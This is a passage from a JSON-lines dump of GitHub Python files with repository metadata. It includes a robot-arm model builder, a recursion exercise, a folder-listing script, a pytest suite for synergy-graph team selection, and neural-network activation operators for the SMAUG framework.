results]))\n","repo_name":"Placekey/placekey-py","sub_path":"placekey/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"42013303598","text":"import Structure\ndef BuildDefaultuArm():\n uArm_Base=Structure.Base(\"uArm_Base\")\n TurnTable=Structure.TurnTable(\"TurnTable\")\n Arm1=Structure.Arm(\"Arm1\",[[8,-16,192],[8,16,192],[-55,16,192],[8,-16,0]],[0,0,142])\n Arm1.LimInterval=[-40,90]\n Arm1.TurnedAngle=-40\n Arm2=Structure.Arm(\"Arm2\",[[0,-10,158.8],[-60,-10,158.8],[-60,10,158.8],[0,-10,0]],[0,0,158.8])\n Arm2.LimInterval=[0,180]\n Arm2.TurnedAngle=180\n ArmLvl=Structure.ArmLvl(\"ArmLvl\",[[44.5,-15,35],[44.5,15,35],[-44.5,15,35],[44.5,-15,-25]],[44.5,0,0])\n TurnTable.ConnectPre(uArm_Base)\n Arm1.ConnectPre(TurnTable)\n Arm2.ConnectPre(Arm1)\n ArmLvl.ConnectPre(Arm2)\n return uArm_Base\n","repo_name":"shendeguize/DeeCamp-2018-RobotArm","sub_path":"Common/Virtual-uArm/Code-Python/Build_uArm.py","file_name":"Build_uArm.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74453425446","text":"# Title : Chapter : 6 - item : 3 - POWER!\n\ndef power(n, p) :\n if p > 0 :\n # print(n,p)\n return n * power(n, p - 1)\n elif p == 0 :\n return 1\n\nif __name__ == '__main__' :\n a, b = map(int, input('Enter Input a b : ').split())\n print(power(a, b))","repo_name":"Charonyx/DataStruct2564","sub_path":"Chap06 Recursion/chap06_3power.py","file_name":"chap06_3power.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3188808089","text":"from grave import FactorizationMachine\nfrom utils import RandomVectors\n\n\nif __name__ == '__main__':\n\n fm = FactorizationMachine.load_model(\"../out/all_stable_bandgap_dim20.fm.ctx10_add_cont.model\")\n atom_vectors = fm.W\n\n elems = list(fm.dictionary.keys())\n\n rv = RandomVectors(elems=elems, dim=20, mean=0, std=1)\n\n rv.save(\"../out/all_stable_bandgap_dim20.random.model\")\n","repo_name":"lantunes/materials-sandbox","sub_path":"scripts/create_random_vectors.py","file_name":"create_random_vectors.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71259372327","text":"# This script is meant to 
crawl through a user selected hard drive,\n# and show them all their folders;\nimport os\n\n# choose a drive\ndriveLetter = input('Enter drive letter: ')\n\ndriveName = driveLetter + ':/'\n\n# Building a class to handle directories\n# Might be a good idea to determine a root folder\nclass DirectoryManager:\n def __init__(self, dir, drive):\n self.drive = drive\n self.dir = dir\n\n # Function to get directory count of chosen drive\n def getDirectoryCount(self):\n if os.path.exists(self.drive):\n count = 0\n allDirectories = os.listdir(self.drive)\n for name in allDirectories:\n count = count+1\n fileAndFolder = (\"File and Folder count: %d\" % count)\n return fileAndFolder\n else:\n return \"Drive doesn't exist or improper format\"\n\n # Function to list all folders/directories within drive\n def listAllDirectories(self):\n if os.path.exists(self.drive):\n allDirectories = os.listdir(self.drive)\n return allDirectories\n else:\n return \"Drive doesn't exist or improper format\"\n\n\n\n\n\ndDrive = DirectoryManager('', driveName)\nprint(dDrive.getDirectoryCount())\nprint(dDrive.listAllDirectories())","repo_name":"zachcyrus/PythonPractice","sub_path":"FolderSizes/FileSize.py","file_name":"FileSize.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39879652129","text":"import pytest\nimport itertools\nimport copy\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom src.synergy import *\nfrom src.synergy_graph import *\nfrom src.weight_fns import *\nfrom src.normal_distribution import *\nfrom src.observation_set import *\n\ndef get_figure_3_synergy_graph():\n\t\"\"\"\n\tbuild the graph in figure 3 of paper by Liemhetcharat and Veloso\n\t\"\"\"\n\tG = nx.Graph()\n\tG.add_edge(1,2)\n\tG.add_edge(2,4)\n\tG.add_edge(4,1)\n\tG.add_edge(4,5)\n\tG.add_edge(5,6)\n\tG.add_edge(6,3)\n\n\t# Create dict of normal distributions for M=1 tasks\n\tN = dict()\n\tN[1] = [NormalDistribution(5,1)]\n\tN[2] = [NormalDistribution(5,2)]\n\tN[3] = [NormalDistribution(23,4)]\n\tN[4] = [NormalDistribution(20,7)]\n\tN[5] = [NormalDistribution(10,3)]\n\tN[6] = [NormalDistribution(8,1)]\n\n\t# Create graph\n\tS = SynergyGraph(G, N)\n\treturn S\n\n\ndef get_figure_3_synergy_graph_zero_indexed():\n\t\"\"\"\n\tbuild the graph in figure 3 of paper by Liemhetcharat and Veloso\n\twith agents indexed from 0\n\t\"\"\"\n\tG = nx.Graph()\n\tG.add_edge(0,1)\n\tG.add_edge(1,3)\n\tG.add_edge(3,0)\n\tG.add_edge(3,4)\n\tG.add_edge(4,5)\n\tG.add_edge(5,2)\n\n\t# Create dict of normal distributions for M=1 tasks\n\tN = dict()\n\tN[0] = [NormalDistribution(5,1)]\n\tN[1] = [NormalDistribution(5,2)]\n\tN[2] = [NormalDistribution(23,4)]\n\tN[3] = [NormalDistribution(20,7)]\n\tN[4] = [NormalDistribution(10,3)]\n\tN[5] = [NormalDistribution(8,1)]\n\n\t# Create graph\n\tS = SynergyGraph(G, N)\n\treturn S\n\ndef get_random_synergy_graph(num_agents, M, gamma):\n\t\"\"\"\n\tcreate a random synergy graph with a given number of agents,\n\ta specified number of subtasks and gamma\n\t\"\"\"\n\tnearest_neighbors = 3\n\trewire_prob = 0.3\n\tG = nx.generators.random_graphs.connected_watts_strogatz_graph(num_agents, nearest_neighbors, rewire_prob)\n\tN = dict()\n\tfor agent in range(num_agents):\n\t\t# random mean between [-gamma, gamma]\n\t\t# random variance between [0.1, gamma]\n\t\tN[agent] = [NormalDistribution(random.random() * 2 * gamma - gamma, random.random() * gamma + 0.1) for m in range(M)]\n\treturn SynergyGraph(G, 
N)\n\ndef test_weight_fn_reciprocal():\n\tassert weight_fn_reciprocal(1) == 1\n\tassert weight_fn_reciprocal(2) == 0.5\n\ndef test_weight_fn_exponential():\n\tassert weight_fn_exponential(0, 1) == 1\n\tassert weight_fn_exponential(1, 1) == 2\n\tassert weight_fn_exponential(5, 1) == 2 ** 5\n\ndef test_value_fn_sum():\n\tp = 0.5\n\ta_distributions = [NormalDistribution(1,1), NormalDistribution(2,2)]\n\ta_0_eval = NormalDistribution(1,1).evaluate(p)\n\ta_1_eval = NormalDistribution(2,2).evaluate(p)\n\tassert value_fn_sum(a_distributions, p) == (a_0_eval + a_1_eval)\n\n\tb_distributions = [NormalDistribution(4,5), NormalDistribution(6,7)]\n\tb_0_eval = NormalDistribution(4,5).evaluate(p)\n\tb_1_eval = NormalDistribution(6,7).evaluate(p)\n\tassert value_fn_sum(b_distributions, p) == (b_0_eval + b_1_eval)\n\ndef test_value_fn_with_synergy_repeat():\n\tS = get_figure_3_synergy_graph()\n\tp = 0.5\n\tf = lambda team: value_fn_sum(synergy(S, team, weight_fn_reciprocal), p)\n\n\tA1 = [5,2,6]\n\tvalue_A1 = f(A1)\n\tA2 = [2,5,6]\n\tvalue_A2 = f(A2)\n\tA3 = [6,2,5]\n\tvalue_A3 = f(A3)\n\n\tassert value_A1 == value_A2\n\tassert value_A2 == value_A3\n\tassert value_A1 == value_A3\n\ndef test_elementwise_add():\n\ta_distributions = [NormalDistribution(1,1)]\n\tb_distributions = [NormalDistribution(4,5)]\n\tresult = elementwise_add(a_distributions, b_distributions)\n\tassert result == [NormalDistribution(5,6)]\n\n\ta_distributions = [NormalDistribution(1,1), NormalDistribution(2,2)]\n\tb_distributions = [NormalDistribution(4,5), NormalDistribution(6,7)]\n\tresult = elementwise_add(a_distributions, b_distributions)\n\tassert result == [NormalDistribution(5,6), NormalDistribution(8,9)]\n\ndef test_pairwise_synergy():\n\t# Create a path graph\n\tG = nx.generators.classic.path_graph(3)\n\tassert list(G.nodes()) == [0, 1, 2]\n\n\t# Create dict of normal distributions for M=2 tasks\n\tN = dict()\n\tN[0] = [NormalDistribution(0,1), NormalDistribution(1,2)]\n\tN[1] = [NormalDistribution(2,3), NormalDistribution(3,4)]\n\tN[2] = [NormalDistribution(4,5), NormalDistribution(5,6)]\n\n\t# Create and query graph\n\tS = SynergyGraph(G, N)\n\n\t# Get pairwise synergy for nodes 0 and 2\n\tpair_synergy = pairwise_synergy(S, weight_fn_reciprocal, 0, 2)\n\tassert pair_synergy == [0.5 * NormalDistribution(4,6), 0.5 * NormalDistribution(6,8)]\n\ndef test_synergy_with_figure_3():\n\tS = get_figure_3_synergy_graph()\n\n\t# Get synergy of different teams described at the end of Section 3.2\n\tteam_A = [1,2]\n\tteam_A_synergy = synergy(S, team_A, weight_fn_reciprocal)\n\tassert len(team_A_synergy) == 1\n\tassert team_A_synergy[0].mean == 10\n\n\tteam_B = [1,2,3]\n\tteam_B_synergy = synergy(S, team_B, weight_fn_reciprocal)\n\tassert len(team_B_synergy) == 1\n\tassert team_B_synergy[0].mean == 8\n\n\tteam_C = [1,2,4]\n\tteam_C_synergy = synergy(S, team_C, weight_fn_reciprocal)\n\tassert len(team_C_synergy) == 1\n\tassert team_C_synergy[0].mean == 20\n\n\t# Check final task values\n\tp = 0.50\n\tteam_A_value = team_A_synergy[0].evaluate(p)\n\tteam_B_value = team_B_synergy[0].evaluate(p)\n\tteam_C_value = team_C_synergy[0].evaluate(p)\n\tassert team_A_value > team_B_value\n\tassert team_C_value > team_B_value\n\tassert team_C_value > team_A_value\n\ndef test_random_team_neighbor_full_team():\n\tmathcal_A = [1,2,3,4]\n\tA = [1,2,3,4]\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert A == B\n\ndef test_random_team_neighbor_1():\n\tmathcal_A = [1,2,3,4]\n\tA = [1,2,3]\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert len(B) == 
3\n\tassert (4 in B)\n\ndef test_random_team_neighbor_2():\n\tmathcal_A = [4,3,2,1]\n\tA = [1,2]\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert len(B) == 2\n\tassert (1 not in B) or (2 not in B)\n\ndef test_random_team_neighbor_3():\n\tmathcal_A = [4,3,2,1]\n\tA = [1,2]\n\toriginal_A = A.copy()\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert len(A) == 2\n\tassert A == original_A\n\ndef test_random_team_neighbor_runtime_err():\n\tmathcal_A = []\n\tA = [1,2,3,4]\n\twith pytest.raises(RuntimeError) as excinfo:\n\t\tB = random_team_neighbor(mathcal_A, A)\n\tassert \"no agents available\" in str(excinfo.value)\n\ndef test_get_approx_optimal_team_figure_3():\n\tS = get_figure_3_synergy_graph()\n\tmathcal_A = [1,2,3,4,5,6]\n\tn = 3\n\tp = 0.50\n\tk_max = 100\n\tapprox_A, approx_value, approx_teams, approx_values = get_approx_optimal_team(S, mathcal_A, n, p, k_max, weight_fn_reciprocal)\n\n\t# Optimal teams of size 3 (to test the solution found by annealing)\n\t# [3,5,6] with value 21.8333\n\t# [1,4,5] with value 20.8333\n\t# [2,4,5] with value 20.8333\n\t# [4,5,6] with value 20.6666\n\t# [3,4,5] with value 20.2777\n\n\tfound_team_1 = set(approx_A) == set([3,5,6]) and np.round(approx_value, 3) == 21.833\n\tfound_team_2 = set(approx_A) == set([1,4,5]) and np.round(approx_value, 3) == 20.833\n\tfound_team_3 = set(approx_A) == set([2,4,5]) and np.round(approx_value, 3) == 20.833\n\t\n\tassert found_team_1 or found_team_2 or found_team_3\n\tassert len(approx_teams) == len(approx_values)\n\tassert len(approx_values) <= k_max\n\tassert approx_A == approx_teams[-1]\n\tassert approx_value == approx_values[-1]\n\ndef test_get_approx_optimal_team_brute_figure_3():\n\tS = get_figure_3_synergy_graph()\n\tmathcal_A = [1,2,3,4,5,6]\n\tp = 0.50\n\tk_max = 100\n\tbrute_best_team, brute_best_value = get_approx_optimal_team_brute(S, mathcal_A, p, k_max, weight_fn_reciprocal)\n\n\t# Optimal teams (to test the solution found by annealing)\n\t# [3,6] with value 31.0\n\t# [4,5] with value 30.0\n\t# [1,4] with value 25.0\n\t# [2,4] with value 25.0\n\t# [3,5,6] with value 21.8333\n\n\tfound_team_1 = set(brute_best_team) == set([3,6]) and np.round(brute_best_value, 3) == 31.0\n\tfound_team_2 = set(brute_best_team) == set([4,5]) and np.round(brute_best_value, 3) == 30.0\n\tfound_team_3 = set(brute_best_team) == set([1,4]) and np.round(brute_best_value, 3) == 25.0\n\n\tassert found_team_1 or found_team_2 or found_team_3\n\ndef test_random_graph_neighbor_1():\n\tG = nx.generators.classic.path_graph(6)\n\tinitial_nodes = [n for n in G]\n\tinitial_edges = [e for e in G.edges]\n\n\tH = random_graph_neighbor(G)\n\tnew_nodes = [n for n in H]\n\tnew_edges = [e for e in H.edges]\n\n\tassert len(new_nodes) == len(initial_nodes)\n\tassert (len(new_edges) - 1) == len(initial_edges) or (len(new_edges) + 1) == len(initial_edges)\n\tassert new_edges != initial_edges\n\tassert new_nodes == initial_nodes\n\ndef test_random_graph_neighbor_2():\n\tG = nx.Graph()\n\tG.add_edge(1,2)\n\tG.add_edge(2,4)\n\tG.add_edge(4,1)\n\tG.add_edge(4,5)\n\tG.add_edge(5,6)\n\tG.add_edge(6,3)\n\n\tinitial_nodes = [n for n in G]\n\tinitial_edges = [e for e in G.edges]\n\n\tH = random_graph_neighbor(G)\n\tnew_nodes = [n for n in H]\n\tnew_edges = [e for e in H.edges]\n\n\tassert len(new_nodes) == len(initial_nodes)\n\tassert (len(new_edges) - 1) == len(initial_edges) or (len(new_edges) + 1) == len(initial_edges)\n\tassert new_edges != initial_edges\n\tassert new_nodes == initial_nodes\n\ndef test_random_graph_neighbor_3():\n\t\"\"\"\n\tcheck that the 
synergy graph can be iterated with \n\trandom graph neighbor\n\t\"\"\"\n\tS = get_figure_3_synergy_graph()\n\tinitial_nodes = [n for n in S.graph.nodes]\n\tinitial_edges = [e for e in S.graph.edges]\n\n\tG = random_graph_neighbor(S.graph)\n\n\tnew_nodes = [n for n in G.nodes]\n\tnew_edges = [e for e in G.edges]\n\n\tassert len(new_nodes) == len(initial_nodes)\n\tassert (len(new_edges) - 1) == len(initial_edges) or (len(new_edges) + 1) == len(initial_edges)\n\tassert new_edges != initial_edges\n\tassert new_nodes == initial_nodes\n\ndef test_log_likelihood_w_graph_neighbor():\n\t\"\"\"\n\tcheck that the log likelihood of observations changes\n\twith a random graph neighbor of a synergy graph\n\t\"\"\"\n\tS = get_figure_3_synergy_graph()\n\tM = 1\n\tA = [1,2,3]\n\to1 = [[3], [4], [5]]\n\tobservation_group = ObservationGroup(A, M)\n\tobservation_group.add_observations(o1)\n\n\tA2 = [3,4]\n\to2 = [[30], [40], [30], [35]]\n\tobservation_group2 = ObservationGroup(A2, M)\n\tobservation_group2.add_observations(o2)\n\tobservation_set = ObservationSet(M, [observation_group, observation_group2])\n\t\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\tH = random_graph_neighbor(S.graph)\n\tS_prime = SynergyGraph(H, S.normal_distributions)\n\tlikelihood2 = log_likelihood(observation_set, S_prime, weight_fn_reciprocal)\n\tassert np.round(likelihood, 3) != np.round(likelihood2, 3)\n\ndef create_observation_group(S, A, M, group_size):\n\t\"\"\"\n\thelper function to create an observation group\n\t\"\"\"\n\tsynergy_A = synergy(S, A, weight_fn_reciprocal)\n\togroup = ObservationGroup(A, M)\n\tobservations = []\n\tfor i in range(group_size):\n\t\tobservation = list(map(lambda distr: distr.sample(1).item(), synergy_A))\n\t\tobservations.append(observation)\n\togroup.add_observations(observations)\n\treturn ogroup\n\ndef create_observation_set(S, As, M, group_size):\n\t\"\"\"\n\thelper function to create an observation set from a list of teams\n\t\"\"\"\n\togroups = []\n\tfor A in As:\n\t\tgroup = create_observation_group(S, A, M, group_size)\n\t\togroups.append(group)\n\tos = ObservationSet(M, ogroups)\n\treturn os\n\ndef test_log_likelihood_1():\n\t\"\"\"\n\tconsider a large set of agents, but only with observations\n\tfor a small subset (no asserts, just checking that there are no errors)\n\t\"\"\"\n\tM = 3\n\tmathcal_A = [0,1,2,3,4,5]\n\n\tA = [0,1,2]\n\to1 = [[3,3,3], [4,4,4], [5,5,5]]\n\tobservation_group = ObservationGroup(A, M)\n\tobservation_group.add_observations(o1)\n\tobservation_set = ObservationSet(M, [observation_group])\n\n\tnum_agents = len(mathcal_A)\n\tnearest_neighbors = 3\n\trewire_prob = 0.3\n\tG = nx.generators.random_graphs.connected_watts_strogatz_graph(num_agents, nearest_neighbors, rewire_prob)\n\tN = estimate_capability(observation_set, G, weight_fn_reciprocal)\n\n\tS = SynergyGraph(G, N)\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\ndef test_log_likelihood_2():\n\t\"\"\"\n\tcreate some synthetic observations from the synergy graph\n\tand ensure their log likelihood is higher than random handcrafted observations\n\t\"\"\"\n\tM = 1\n\tS = get_figure_3_synergy_graph()\n\tobservation_group_size = 50\n\t\n\tAs = [[1,2,4], [1,2], [2,5], [2,6], [2,3], [3,6], [4,5,6], [5,6,3], [1,4,5], [1,5,3]]\n\tobservation_set = create_observation_set(S, As, M, observation_group_size)\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\n\t# Change distributions\n\tS_prime = copy.deepcopy(S)\n\tS_prime.normal_distributions[3] = 
[NormalDistribution(3, 1)]\n\tS_prime.normal_distributions[4] = [NormalDistribution(17, 5)]\n\tobservation_set2 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood2 = log_likelihood(observation_set2, S, weight_fn_reciprocal)\n\n\tassert likelihood > likelihood2\n\n\t# Change distributions further\n\tS_prime.normal_distributions[1] = [NormalDistribution(30, 1)]\n\tS_prime.normal_distributions[5] = [NormalDistribution(2, 1)]\n\tobservation_set3 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood3 = log_likelihood(observation_set3, S, weight_fn_reciprocal)\n\n\tassert likelihood2 > likelihood3\n\ndef test_log_likelihood_3():\n\t\"\"\"\n\tcreate some synthetic observations from the synergy graph\n\tand ensure their log likelihood is higher than random handcrafted observations\n\tthis time with fewer teams\n\t\"\"\"\n\tM = 1\n\tS = get_figure_3_synergy_graph()\n\tobservation_group_size = 50\n\n\tAs = [[2,5], [2,6]]\n\tobservation_set = create_observation_set(S, As, M, observation_group_size)\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\n\t# Change distributions\n\tS_prime = copy.deepcopy(S)\n\tS_prime.normal_distributions[6] = [NormalDistribution(3, 1)]\n\tobservation_set2 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood2 = log_likelihood(observation_set2, S, weight_fn_reciprocal)\n\n\tassert likelihood > likelihood2\n\n\t# Change distributions further\n\tS_prime.normal_distributions[5] = [NormalDistribution(2, 1)]\n\tobservation_set3 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood3 = log_likelihood(observation_set3, S, weight_fn_reciprocal)\n\n\tassert likelihood2 > likelihood3\n\ndef test_log_likelihood_4():\n\t\"\"\"\n\tensure that when sampling from one of two distributions, \n\twe have that the likelihood of the true distribution is greater\n\t\"\"\"\n\tdistr1 = NormalDistribution(5, 3)\n\tdistr2 = NormalDistribution(7, 3)\n\n\tsample1 = distr1.sample(50)\n\tsample2 = distr2.sample(50)\n\n\tlikelihood_sample_1_from_distr1 = 0\n\tlikelihood_sample_1_from_distr2 = 0\n\tfor s in sample1:\n\t\tlikelihood_sample_1_from_distr1 += distr1.logpdf(s)\n\t\tlikelihood_sample_1_from_distr2 += distr2.logpdf(s)\n\tassert likelihood_sample_1_from_distr1 > likelihood_sample_1_from_distr2\n\n\tlikelihood_sample_2_from_distr1 = 0\n\tlikelihood_sample_2_from_distr2 = 0\n\tfor s in sample2:\n\t\tlikelihood_sample_2_from_distr1 += distr1.logpdf(s)\n\t\tlikelihood_sample_2_from_distr2 += distr2.logpdf(s)\n\tassert likelihood_sample_2_from_distr1 < likelihood_sample_2_from_distr2\n\n# Test case turned off (due to runtime), but it has passed!\ndef off_test_create_synergy_graph_1():\n\t\"\"\"\n\tuse the figure 3 synergy graph and create synthetic observations, \n\tthen check that we arrive at approximately same graph through annealing\n\tand that length of graphs and values are equal in length\n\t\"\"\"\n\tM = 1\n\tS = get_figure_3_synergy_graph_zero_indexed()\n\tagents = list(S.graph.nodes)\n\tk_max = 100\n\n\tAs = [list(i) for i in itertools.combinations(agents, r=2)] + \\\n\t [list(i) for i in itertools.combinations(agents, r=3)]\n\tobservation_group_size = 100\n\tobservation_set = create_observation_set(S, As, M, observation_group_size)\n\n\tfinal_sgraph, final_value, sgraphs, values = create_synergy_graph(observation_set, agents, weight_fn_reciprocal, k_max, display=True)\n\tassert len(sgraphs) == len(values)\n\tassert len(values) <= k_max\n\tassert final_value == 
values[-1]\n\n# Test case turned off (due to runtime), but it has passed!\ndef off_test_create_synergy_graph_2():\n\t\"\"\"\n\tusing a random synergy graph, create synthetic observations, \n\tthen check that we arrive at approximately same graph through annealing\n\tand plot log likelihood error\n\t\"\"\"\n\tM = 1 \n\tnum_agents = 10\n\tgamma = 10\n\tk_max = 200\n\tS = get_random_synergy_graph(num_agents, M, gamma)\n\tagents = list(S.graph.nodes)\n\n\tAs = [list(i) for i in itertools.combinations(agents, r=2)] + \\\n\t [list(i) for i in itertools.combinations(agents, r=3)]\n\tobservation_group_size = 100\n\tobservation_set = create_observation_set(S, As, M, observation_group_size)\n\n\tlikelihood_o_given_true = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\tfinal_sgraph, final_value, sgraphs, values = create_synergy_graph(observation_set, agents, weight_fn_reciprocal, k_max, display=False)\n\tlikelihood_errors = list(map(lambda likelihood_o_given_learned: abs(likelihood_o_given_true - likelihood_o_given_learned), values))\n\n\t# Plot true graph, initial graph, learned graph, and log likelihood error\n\tgs = gridspec.GridSpec(2, 3)\n\tfig = plt.figure()\n\n\tax1 = fig.add_subplot(gs[0, 0], title=\"True Graph\") \n\tnx.draw(S.graph, ax=ax1, with_labels=True, font_weight='bold')\n\n\tax2 = fig.add_subplot(gs[0, 1], title=\"Initial Graph\") \n\tinitial_graph = sgraphs[0]\n\tnx.draw(initial_graph.graph, ax=ax2, with_labels=True, font_weight='bold')\n\n\tax3 = fig.add_subplot(gs[0, 2], title=\"Learned Graph\") \n\tnx.draw(final_sgraph.graph, ax=ax3, with_labels=True, font_weight='bold')\n\n\tax3 = fig.add_subplot(gs[1, :], title=\"Error of Learned Graph for every Accepted Annealing Step\", xlabel=\"Step\", ylabel=\"Log-Likelihood Error\") \n\tax3.plot(likelihood_errors)\n\tplt.show()\n","repo_name":"psandovalsegura/synergy-algorithms","sub_path":"tests/test_synergy.py","file_name":"test_synergy.py","file_ext":"py","file_size_in_byte":17166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"650774151","text":"from smaug.core import node_pb2, types_pb2\nfrom smaug.python import global_vars\nfrom smaug.python.ops import array_ops, common\n\ndef _set_activation_params(activation, params, proto):\n \"\"\"Set the parameters of the activation function.\n\n Args:\n activation: An activation op type such as `types_pb2.ReLU`.\n params: kwargs for the activation function parameters.\n proto: An `ActivationParams`, the proto to set.\n \"\"\"\n if params is not None:\n if activation == types_pb2.LReLU:\n proto.lrelu_params.slope = params[\"slope\"]\n elif activation == types_pb2.ELU:\n proto.elu_params.alpha = params[\"alpha\"]\n elif activation == types_pb2.SELU:\n proto.elu_params.alpha = params[\"alpha\"]\n proto.elu_params.lambda_param = params[\"lambda_param\"]\n elif activation == types_pb2.HardTanh:\n proto.hard_tanh_params.min = params[\"min\"]\n proto.hard_tanh_params.max = params[\"max\"]\n else:\n # Use default values for the parameters if not specified.\n if activation == types_pb2.LReLU:\n proto.lrelu_params.slope = 0.2\n elif activation == types_pb2.ELU:\n proto.elu_params.alpha = 0.1\n elif activation == types_pb2.SELU:\n proto.elu_params.alpha = 1.6733\n proto.elu_params.lambda_param = 1.0507\n elif activation == types_pb2.HardTanh:\n proto.hard_tanh_params.min = -1\n proto.hard_tanh_params.max = 1\n\ndef get_activation_op(activation):\n \"\"\"Return an activation function functor.\n\n Args:\n activation: A string 
representing the activation function.\n \"\"\"\n return _activation_type_op_tuples[activation][1]\n\ndef to_proto(activation, params):\n \"\"\"Return the activation proto.\n\n Args:\n activation: A string representing the activation function.\n params: kwargs for the activation function parameters.\n proto: An `ActivationParams`, the proto to set.\n\n Returns:\n An `ActivationParams`, the proto.\n \"\"\"\n proto = node_pb2.ActivationParams()\n act_type = _activation_type_op_tuples[activation][0]\n proto.activation = act_type\n _set_activation_params(act_type, params, proto)\n return proto\n\ndef relu(input_tensor, name=\"relu\"):\n \"\"\"Rectified linear unit operator.\"\"\"\n return common.add_node(\n name=name, op=types_pb2.ReLU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\ndef lrelu(input_tensor, slope=0.2, name=\"lrelu\"):\n \"\"\"Leaky rectified linear unit operator: max(slope * x, 0).\"\"\"\n params = node_pb2.Params()\n params.act_params.lrelu_params.slope = slope\n return common.add_node(\n name=name, op=types_pb2.LReLU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef elu(input_tensor, alpha=0.1, name=\"relu\"):\n \"\"\"Exponential linear unit function.\n\n Defined as:\n if input_tensor > 0, alpha * exp(input_tensor - 1), else input_tensor.\n \"\"\"\n params = node_pb2.Params()\n params.act_params.elu_params.alpha = alpha\n return common.add_node(\n name=name, op=types_pb2.ELU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef selu(input_tensor, alpha=1.6733, lambda_param=1.0507, name=\"selu\"):\n \"\"\"Scaled exponential linear unit function.\n\n Defined as: lambda_param * elu(input_tensor, alpha).\n \"\"\"\n params = node_pb2.Params()\n params.act_params.elu_params.alpha = alpha\n params.act_params.elu_params.lambda_param = lambda_param\n return common.add_node(\n name=name, op=types_pb2.SELU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef tanh(input_tensor, name=\"tanh\"):\n \"\"\"Tanh operator.\"\"\"\n return common.add_node(\n name=name, op=types_pb2.Tanh, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\ndef hard_tanh(input_tensor, min=-1, max=1, name=\"hard_tanh\"):\n \"\"\"Hard tanh operator.\n\n This bounds the min and max values of the tanh operator.\n \"\"\"\n params = node_pb2.Params()\n params.act_params.hard_tanh_params.min = min\n params.act_params.hard_tanh_params.max = max\n return common.add_node(\n name=name, op=types_pb2.HardTanh, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef sigmoid(input_tensor, name=\"sigmoid\"):\n \"\"\"Sigmoid operator.\n\n Defined as 1/(1 + exp(-input_tensor)).\n \"\"\"\n return common.add_node(\n name=name, op=types_pb2.Sigmoid, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\ndef softmax(input_tensor, name=None):\n \"\"\"Softmax operator.\"\"\"\n input_tensor = array_ops.check_and_add_layout_transform(\n name=name, op=types_pb2.Softmax, 
input_tensors=[input_tensor])[0]\n return common.add_node(\n name=name, op=types_pb2.Softmax, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\n_activation_type_op_tuples = {\n \"relu\": (types_pb2.ReLU, relu),\n \"lrelu\": (types_pb2.LReLU, lrelu),\n \"elu\": (types_pb2.ELU, elu),\n \"selu\": (types_pb2.SELU, selu),\n \"tanh\": (types_pb2.Tanh, tanh),\n \"hard_tanh\": (types_pb2.HardTanh, hard_tanh),\n \"sigmoid\": (types_pb2.Sigmoid, sigmoid),\n \"softmax\": (types_pb2.Softmax, softmax)\n}\n","repo_name":"harvard-acc/smaug","sub_path":"smaug/python/ops/activation_ops.py","file_name":"activation_ops.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"12407763578","text":"from __future__ import annotations\n\nimport logging\n\nfrom pathlib import Path\n\n\nfrom .dird import DirdMockClient\nfrom .agentd import AgentdMockClient\nfrom .agid import AgidClient\nfrom .confd import ConfdMockClient\nfrom .calld import CalldMockClient\nfrom .database import DbHelper\nfrom .filesystem import FileSystemClient\nfrom wazo_test_helpers.asset_launching_test_case import (\n AbstractAssetLaunchingHelper,\n cached_class_property,\n NoSuchPort,\n NoSuchService,\n WrongClient,\n)\nfrom wazo_test_helpers import until\n\nDEFAULT_LOG_FORMAT = '%(asctime)s [%(process)d] (%(levelname)s) (%(name)s): %(message)s'\nlogging.basicConfig(format=DEFAULT_LOG_FORMAT)\n\n\nclass BaseAssetLaunchingHelper(AbstractAssetLaunchingHelper):\n assets_root = Path(__file__).parent / '..' / '..' / 'assets'\n asset = 'base'\n service = 